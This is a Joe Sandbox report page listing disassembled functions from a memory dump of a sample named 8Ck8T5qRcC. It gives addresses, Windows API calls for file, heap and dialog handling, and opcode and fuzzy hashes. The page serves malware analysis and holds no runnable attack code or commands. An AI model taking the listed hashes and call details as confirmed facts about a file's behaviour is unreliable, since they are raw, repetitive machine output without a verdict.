Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: b9167b76c336c236439970b006248bdde084cb5fce0b6a562d15b152cedc3674
Instruction ID: aac71717e97c3163b0a3f580e7d266792e3b4e861ac27599778540ef830cc99a
Opcode Fuzzy Hash: b9167b76c336c236439970b006248bdde084cb5fce0b6a562d15b152cedc3674
Instruction Fuzzy Hash: F941C570508388DADB218E688C84AF6BBEADF49304F1804EDE59B87142E275AA459F70

Function 00DBD5BC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,000000FF), ref: 00DBD62D

Strings

LCMapStringEx, xrefs: 00DBD5CD, 00DBD5D7

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: b6224c5f382288e0f5b480d955958b20a2d27fec040ca0eb49d9203ee04d9cc9
Instruction ID: 32b1b0630052a11d7581b837d3a67830022dcec5d833df48366313a75125374e
Opcode Fuzzy Hash: b6224c5f382288e0f5b480d955958b20a2d27fec040ca0eb49d9203ee04d9cc9
Instruction Fuzzy Hash: C501133250020EFBCF126F94DD02EEE7F62EF08720F004119FE0966160D6768931ABA5

Function 00DBD55A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00DBCBBF), ref: 00DBD5A5

Strings

InitializeCriticalSectionEx, xrefs: 00DBD56B, 00DBD575

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 9ef3e1f6fd4dbd8ebece0bccad8f2a708e4d4a6c1470d64408921f0744a39119
Instruction ID: 68e5d054bb588e822fde3d9f1be9a1a2c5d983abc56f9c0a4a24439bfac347d6
Opcode Fuzzy Hash: 9ef3e1f6fd4dbd8ebece0bccad8f2a708e4d4a6c1470d64408921f0744a39119
Instruction Fuzzy Hash: E2F0243564231DFFCB106FA4CD05DEDBFA1DF18710B004029FC0557260DA318A109BB5

Function 00DBD3FF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00DBD43E

Strings

FlsAlloc, xrefs: 00DBD410, 00DBD41A

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 9e973d1b7aa6e06a9009c0f72af36b500b0cada628c35781391195527b6b0165
Instruction ID: f30e8a26b13b64c62aa9f90f4509ee4633d072a60827862f0458ebea0491adba
Opcode Fuzzy Hash: 9e973d1b7aa6e06a9009c0f72af36b500b0cada628c35781391195527b6b0165
Instruction Fuzzy Hash: DDE0E530A4131EFB86146BA89C16EADBB67CB58B20B410169F80697340DD719D0196BA

Function 00DB10A8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB10BA

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Strings

3To, xrefs: 00DB10A8, 00DB10B4

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3To
API String ID: 1269201914-245939750
Opcode ID: 154fa0ad7f91f7be9f9756bd254bca71aad5d54cfaedd5bc55ca9ab869f629eb
Instruction ID: 263ce6dd1c471974113a1942cdf7e7f37f0a1564629dae0f3135e3339b84d903
Opcode Fuzzy Hash: 154fa0ad7f91f7be9f9756bd254bca71aad5d54cfaedd5bc55ca9ab869f629eb
Instruction Fuzzy Hash: F5B012E539C101FC32143344EC12CF7011DC5C0B10371CA2FF486C00C09940BDC90032

Function 00DBE240 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00DBDE0B: GetOEMCP.KERNEL32(00000000,?,?,00DBE094,?), ref: 00DBDE36

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00DBE0D9,?,00000000), ref: 00DBE2B4
GetCPInfo.KERNEL32(00000000,00DBE0D9,?,?,?,00DBE0D9,?,00000000), ref: 00DBE2C7

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 36efa55ff6244b5a95162c95db99eb866bc457ae8ec2b3563488d61ad26acd1b
Instruction ID: 11eb2fb0e7baa7b41eff342dcdbe1092e22d95a354b9c9d0b58a14c78a739f54
Opcode Fuzzy Hash: 36efa55ff6244b5a95162c95db99eb866bc457ae8ec2b3563488d61ad26acd1b
Instruction Fuzzy Hash: CB510170904306DEDB249F75C8816FABBE5EF51301F18856ED0978B351E639E941CBB1

Function 00D9B45F Relevance: 3.1, APIs: 2, Instructions: 140COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,00000800,?,?,00000000,?,?,00D9B43B,00000800,00000800,00000000,?,?,00D9A31D,?), ref: 00D9B5EB
GetLastError.KERNEL32(?,?,00D9A31D,?,?,?,?,?,?,?,?), ref: 00D9B5FA

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: ccd8e50b7704d8ce9de500c38b6e57cc3a19930b3d4f508b8d4f9e7b36e3ba46
Instruction ID: 57ef547f661a993e9666773b632ed78659691892c8092567e24fe92049f418d3
Opcode Fuzzy Hash: ccd8e50b7704d8ce9de500c38b6e57cc3a19930b3d4f508b8d4f9e7b36e3ba46
Instruction Fuzzy Hash: D241C231604345CBDF64AF64E6849BAB3E5EF98334F16462BE48683241D7B4D8809BB1

Function 00DBE077 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00DBB9A5: GetLastError.KERNEL32(?,00DD50C4,00DB6E12,00DD50C4,?,?,00DB688D,?,?,00DD50C4), ref: 00DBB9A9
Part of subcall function 00DBB9A5: _free.LIBCMT ref: 00DBB9DC
Part of subcall function 00DBB9A5: SetLastError.KERNEL32(00000000,?,00DD50C4), ref: 00DBBA1D
Part of subcall function 00DBB9A5: _abort.LIBCMT ref: 00DBBA23

Part of subcall function 00DBE19E: _abort.LIBCMT ref: 00DBE1D0
Part of subcall function 00DBE19E: _free.LIBCMT ref: 00DBE204

Part of subcall function 00DBDE0B: GetOEMCP.KERNEL32(00000000,?,?,00DBE094,?), ref: 00DBDE36

_free.LIBCMT ref: 00DBE0EF
_free.LIBCMT ref: 00DBE125

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 4180ccd01eff8df9b0ba4f1b94551678c80ec578e3c50bdfc8e16303fa975109
Instruction ID: 2861dcc2523a887bb5f8b4cad4d62548546c0bde9563a1db769cbcdf69aae12d
Opcode Fuzzy Hash: 4180ccd01eff8df9b0ba4f1b94551678c80ec578e3c50bdfc8e16303fa975109
Instruction Fuzzy Hash: D1318131904208EFDB10EFA9D441AE9BBF5EF55360F25409AF5069B291EBB29D41CB70

Function 00D9B01E Relevance: 3.1, APIs: 2, Instructions: 89fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000000,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00D9B967,?,?,00D987FD), ref: 00D9B0A4
CreateFileW.KERNEL32(?,?,00000000,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00D9B967,?,?,00D987FD), ref: 00D9B0D4

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3b3023baad4a7f83a9cea262e1997c8cadbe39e99d73e1e87f11ab55eaba344e
Instruction ID: 27fee5786eabe641fb251c08624449c8e31f3e5e7f7f12b788e171ca370c8661
Opcode Fuzzy Hash: 3b3023baad4a7f83a9cea262e1997c8cadbe39e99d73e1e87f11ab55eaba344e
Instruction Fuzzy Hash: 29219E71504344AFE7309F24DD89BB7B7ECEB89320F454A1AF9E9C21D1D774A8448672

Function 00D9B7E2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?), ref: 00D9B7FC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00D9B8B0

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: fde49ce17a29eddbd8f8bb0ff797d4c05a85d4356fb12f3567956709f5647c82
Instruction ID: e2d081e7a5fb06e730a166cad95c25d5fa2f045eb43b2085b1bb4e5de638eb5b
Opcode Fuzzy Hash: fde49ce17a29eddbd8f8bb0ff797d4c05a85d4356fb12f3567956709f5647c82
Instruction Fuzzy Hash: 9521D0312482429BCB15DF64D991ABABBE8AF59314F09491EF4C187141D329E90CD772

Function 00D91FB0 Relevance: 3.1, APIs: 2, Instructions: 69COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D91FB7
_wcslen.LIBCMT ref: 00D92052

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: H_prolog3_wcslen
String ID:
API String ID: 3746244732-0
Opcode ID: b5ebb6fa192e9509045b3f43a6550bd8470383f656c5797864b65b0124d01dc2
Instruction ID: 1694f71951fa9bf291b258c7fa10aea92d30780f9f96e02892134779f8ccc874
Opcode Fuzzy Hash: b5ebb6fa192e9509045b3f43a6550bd8470383f656c5797864b65b0124d01dc2
Instruction Fuzzy Hash: 0E213835900219EFCF15AF94C895AEEBBB2FF08300F14042DF58AA72A1CB795A51DB74

Function 00DB6192 Relevance: 3.1, APIs: 2, Instructions: 67libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,00000001,00DF60C8,?,?,?,00DB6386,00000004,InitializeCriticalSectionEx,00DC9624,InitializeCriticalSectionEx,00000000,?,00DB613D,00DF60C8,00000FA0), ref: 00DB6215
GetProcAddress.KERNEL32(00000000,?), ref: 00DB621F

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID:
API String ID: 3013587201-0
Opcode ID: 058e7e515fe7205e2cfd03ed7238f7419f694949e664b6131dde2d53761e3238
Instruction ID: c18f62ecf25fe043e87db767b6eec4cff61674ec9537ef07317ee83447a06658
Opcode Fuzzy Hash: 058e7e515fe7205e2cfd03ed7238f7419f694949e664b6131dde2d53761e3238
Instruction Fuzzy Hash: F1118E35A00216DF9B22CFA8DC809EA77A5FB457A07280169EA57DB310E734DD01CBB4

Function 00D9B8C0 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00D9B907
GetLastError.KERNEL32 ref: 00D9B914

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 34d24cf9920c9c5d4fb631cacbd4d06e011df7f32819bafe230c4878fffac4df
Instruction ID: a1ea55a3b7bc856f8c5e342864b4708354c34608de19baacf1eb6e90346584a3
Opcode Fuzzy Hash: 34d24cf9920c9c5d4fb631cacbd4d06e011df7f32819bafe230c4878fffac4df
Instruction Fuzzy Hash: 2911E530A10711BFDB249629DD45B7673E9EB05370F55072AE252E22D0D770ED45DB70

Function 00DBBB34 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00DBBB55

Part of subcall function 00DBBC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00DB6A24,?,0000015D,?,?,?,?,00DB7F00,000000FF,00000000,?,?), ref: 00DBBCC0

HeapReAlloc.KERNEL32(00000000,?,?,?,?,00DD50C4,00D9190A,?,?,00000007,?,?,?,00D91476,?,00000000), ref: 00DBBB91

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 66b13936cefae6acc363ea8a3a6975e8e7a5ff923486b92eccd92f42d618a80a
Instruction ID: a1752d7d19679f9b5c236fc1009d58579504229960f766693902923cc59fddd8
Opcode Fuzzy Hash: 66b13936cefae6acc363ea8a3a6975e8e7a5ff923486b92eccd92f42d618a80a
Instruction Fuzzy Hash: D1F09632600615EEDB216A66AC01FEF7B58DF81B70B284117F857961A5DFF0DC0191BD

Function 00D9C2E5 Relevance: 3.0, APIs: 2, Instructions: 38COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,?,00000001,?,00D9BF5E,?,?), ref: 00D9C305

Part of subcall function 00D9DA1E: _wcslen.LIBCMT ref: 00D9DA59

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D9BF5E,?,?), ref: 00D9C334

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 98a761b56dcdfb38be2c9450ef9607bd24ff0570be7ad1b64210a58e8da220c1
Instruction ID: 5bae382a6efc8e62ff480132b8d2e34ba147bf8478bacc4de34957e382c58d21
Opcode Fuzzy Hash: 98a761b56dcdfb38be2c9450ef9607bd24ff0570be7ad1b64210a58e8da220c1
Instruction Fuzzy Hash: 46F0903560121AABDF00AF718C01AEE77ACEF08344F808096B901E7250EA31DE449B74

Function 00D9BC65 Relevance: 3.0, APIs: 2, Instructions: 36fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,?,00D9B14B,?,00000000,00D9AF6E,E7604376,00000000,00DC517A,000000FF,?,00D98882,?,?), ref: 00D9BC82

Part of subcall function 00D9DA1E: _wcslen.LIBCMT ref: 00D9DA59

DeleteFileW.KERNEL32(?,?,?,00000800,?,00D9B14B,?,00000000,00D9AF6E,E7604376,00000000,00DC517A,000000FF,?,00D98882,?), ref: 00D9BCAE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: e4b826c794d367e3f8f0d740c8ae9ae524dd1f58867969394b95d5954f2d2f7c
Instruction ID: 361c4cc34b72e7cc00b0172f413f3bbc2ce8cb64afaa233808c7e0c3141c2f3d
Opcode Fuzzy Hash: e4b826c794d367e3f8f0d740c8ae9ae524dd1f58867969394b95d5954f2d2f7c
Instruction Fuzzy Hash: DBF05E3560122AABDB01EF749D45EEE73ACEF09751F444066BA01E3240DF71DE889BB4

Function 00DB030B Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00DB0341

Part of subcall function 00D94C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D94C13

SetDlgItemTextW.USER32(00000065,?), ref: 00DB0358

Part of subcall function 00DAD864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DAD875
Part of subcall function 00DAD864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DAD886
Part of subcall function 00DAD864: IsDialogMessageW.USER32(0001040E,?), ref: 00DAD89A
Part of subcall function 00DAD864: TranslateMessage.USER32(?), ref: 00DAD8A8
Part of subcall function 00DAD864: DispatchMessageW.USER32(?), ref: 00DAD8B2

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

